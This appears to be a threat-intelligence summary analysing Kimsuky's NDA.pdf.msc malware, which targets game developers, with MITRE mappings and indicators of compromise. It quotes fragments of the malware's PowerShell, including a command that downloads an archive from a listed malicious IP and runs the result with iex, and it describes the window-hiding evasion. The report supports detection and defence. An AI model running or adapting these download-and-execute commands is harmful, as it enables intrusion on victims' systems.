Threat Research

North Korea Hacking Group Kimsuky Disguised NDA Document Malware Distribution – NDA.pdf.msc File Warning (2025.5.4)

iocOne
North Korea Hacking Group Kimsuky Disguised NDA Document Malware Distribution – NDA.pdf.msc File Warning (2025.5.4)
EXTRACT IOC
The article analyzes a malware named NDA.pdf.msc created by the North Korean hacking group Kimsuky, disguised as a Non-Disclosure Agreement PDF file targeting organizations related to game development. The malware downloads and executes encrypted payloads using PowerShell scripts and hides its activity to avoid detection, impacting digital security systems and cybersecurity defenses. #Kimsuky #WindowsSecurity

Keypoints

  • The malware file NDA.pdf.msc appears as a PDF icon but is actually a Microsoft Management Console script (.msc) containing embedded malicious code.
  • The malware uses PowerShell commands to download an encrypted RAR archive and an UnRAR executable from a Netherlands-based IP address and extract the contents with a password.
  • The extracted payload is executed stealthily by hiding PowerShell and Windows Terminal windows using the ShowWindow() API to avoid user detection.
  • The malicious payload is encoded in Base64 and requires multiple decoding layers to reveal its functionality.
  • The malware masquerades as an NDA document related to a blockchain-based game development project by BlockForge Studios LLC, likely to lure game development companies.
  • The malware authors use layered obfuscation and PowerShell execution policy bypass to ensure successful payload delivery and execution.
  • Security vendors detect the malware under various Trojan and downloader classifications, indicating widespread recognition of its threat.

MITRE Techniques

  • (T1204) User Execution: The malware masquerades as a legitimate NDA PDF file to trick users into execution. //NDA.pdf.msc appears as a PDF but is a malicious script disguised to deceive users.//
  • (T1059.001) PowerShell: PowerShell scripts are used for downloading, decoding, extracting, and executing malicious payloads. //iwr -Uri “http://109.107.157.107/kaptsole_x.rar” … iex $dref//
  • (T1027) Obfuscated Files or Information: The malware payload is encoded in Base64 three times and requires multiple decode steps. //Base64 encoded malicious code decoded using CyberChef with triple decoding.//
  • (T1218) Signed Binary Proxy Execution: Use of a legitimate UnRAR.exe binary downloaded and executed to extract the malicious archive. //Start-Process -FilePath “$env:TEMPUnRAR.exe” …//
  • (T1562.001) Impair Defenses: The script hides PowerShell and Windows Terminal windows to prevent user from detecting its execution. //ShowWindow() API is called with SW_HIDE to conceal the PowerShell window.//

Indicators of Compromise

  • File Hashes (NDA.pdf.msc malware sample): MD5: 51c83329bb364483f122accf36ebfe76, SHA-1: 4ebfb03a1339cb86051ce685c3e09c9435fd8691, SHA-256: bf13fb57e2a0d8e59f9f10dbfc9edf651c70b31f4bea45abf1f085391b162e61
  • IP Addresses (malicious download servers): 109.107.157.107 (Netherlands-hosted server for downloading malware payloads)
  • File Names (used in malware delivery): NDA.pdf.msc (disguised payload), kaptsole_x.rar (encrypted compressed payload), UnRAR.exe (extraction tool), kaptsole_x.txt (decoded PowerShell script)

Read more: https://wezard4u.tistory.com/429482

Views: 58

Tags: LEAK, BROWSER, TOOL, PROXY, PAYLOAD, WINDOWS, TROJAN, RECONNAISSANCE